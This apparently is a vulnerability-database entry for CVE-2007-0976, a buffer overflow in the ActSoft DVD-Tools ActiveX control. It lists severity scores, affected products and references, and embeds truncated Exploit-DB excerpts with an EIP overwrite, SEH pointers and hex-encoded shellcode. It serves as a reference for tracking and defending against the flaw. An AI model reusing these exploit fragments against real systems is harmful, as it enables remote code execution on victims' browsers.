CVE-2007-0976
published 2007-02-16CVE-2007-0976: Buffer overflow in the ActSoft DVD-Tools ActiveX control (dvdtools.ocx) allows remote attackers to execute arbitrary code via a long DVD_TOOLS.OpenDVD property…
PriorityP343critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
8.79%
94.5th percentile
Buffer overflow in the ActSoft DVD-Tools ActiveX control (dvdtools.ocx) allows remote attackers to execute arbitrary code via a long DVD_TOOLS.OpenDVD property value.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| activex_soft | actsoft_dvd_tools | — | — |
| east_wind_software | advdaudio.ocx | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g7f5-5j5h-6jg7: Buffer overflow in the East Wind Software advdaudio
ghsa_unreviewed·2022-05-01·CVSS 10.0
CVE-2007-2576 [CRITICAL] GHSA-g7f5-5j5h-6jg7: Buffer overflow in the East Wind Software advdaudio
Buffer overflow in the East Wind Software advdaudio.ocx 1.5.1.1 ActiveX control allows user-assisted remote attackers to execute arbitrary code via a long OpenDVD property value. NOTE: this issue might be related to CVE-2007-0976.
GHSA
GHSA-97qr-hm36-rpm6: Buffer overflow in the ActSoft DVD-Tools ActiveX control (dvdtools
ghsa_unreviewed·2022-05-01
CVE-2007-0976 [HIGH] GHSA-97qr-hm36-rpm6: Buffer overflow in the ActSoft DVD-Tools ActiveX control (dvdtools
Buffer overflow in the ActSoft DVD-Tools ActiveX control (dvdtools.ocx) allows remote attackers to execute arbitrary code via a long DVD_TOOLS.OpenDVD property value.
No detection rules found.
Exploit-DB
ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow
exploitdb·2007-05-04
CVE-2007-0976 ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow
ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow
---
'----------------------------------------------------------------------------------
' ActSoft DVD-Tools (dvdtools.ocx v. 3.8.5.0) Stack Overflow Exploit (MoAxB bonus)
' url: http://www.activex-soft.com
'
' original advisory: http://www.shinnai.altervista.org/viewtopic.php?id=41&t_id=30
' http://www.milw0rm.com/exploits/3307
' author: shinnai
' mail: shinnai[at]autistici[dot]org
' site: http://shinnai.altervista.org
' Tested on Windows XP Professional SP2 full patched, with Internet Explorer 7
' This exploit was written for working on Windows XP Professional SP2
'----------------------------------------------------------------------------------
buff = String(380,"A")
get_EIP = unescape("%EB%AA%D7%77")
buff2 = Stri
Exploit-DB
ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow
exploitdb·2007-03-30
CVE-2007-0976 ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow
ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow
---
ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit- By Umesh Wanve
var nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90");
var pointer_to_seh=unescape("%eb%06%90%90");
var seh_handler=unescape("%a9%11%02%75");
var shellcode=
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49")+
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%64")+
unescape("%58%30%41%31%50%42%41%6b%41%41%74%32%41%42%41%32")+
unescape("%42%41%30%42%41%58%38%41%42%50%75%4a%49%6b%4c%79")+
unescape("%78%67%34%45%50%43%30%73%30%4c%4b%72%65%55%6c%4c")+
unescape("%4b%53%4c%53%35%70%78%54%41%7a%4f%6c%4b%72%6f%42")+
unescape("%38%6e%6b%51%4f%35%70%57%71%7a%4b%43%79%4c%4b%77")+
unescape("%44%4e%6b%74%41%48%6e%50%31%79%50%6d%49%6e%
Exploit-DB
ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)
exploitdb·2007-02-14
CVE-2007-0976 ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)
ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)
---
ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow
developer's url: http://www.activex-soft.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This product is selled under 1 Developer License for $129 and under Site Wide License for $499 :)
Using only 400 characters will cause just a crash of IE7 (or of the software that use this
activex), encreasing the number of characters EIP will be overwrite and arbitrary code execution
will be possible.
sub VBButtonClicked()
ActiveX_File = "C:\Programmi\ActiveX Soft\ActSoft DVD-Tools\dvdtools.ocx"
Method = "OpenDVD"
Variable_Declaration = "Sub OpenDVD ( ByVal path As
No writeups or analysis indexed.
http://osvdb.org/33732http://www.securityfocus.com/bid/22558http://www.shinnai.altervista.org/moaxb/20070504/actsoft.txthttp://www.shinnai.altervista.org/viewtopic.php?id=41&t_id=30https://exchange.xforce.ibmcloud.com/vulnerabilities/32529https://www.exploit-db.com/exploits/3307https://www.exploit-db.com/exploits/3610http://osvdb.org/33732http://www.securityfocus.com/bid/22558http://www.shinnai.altervista.org/moaxb/20070504/actsoft.txthttp://www.shinnai.altervista.org/viewtopic.php?id=41&t_id=30https://exchange.xforce.ibmcloud.com/vulnerabilities/32529https://www.exploit-db.com/exploits/3307https://www.exploit-db.com/exploits/3610
2007-02-16
Published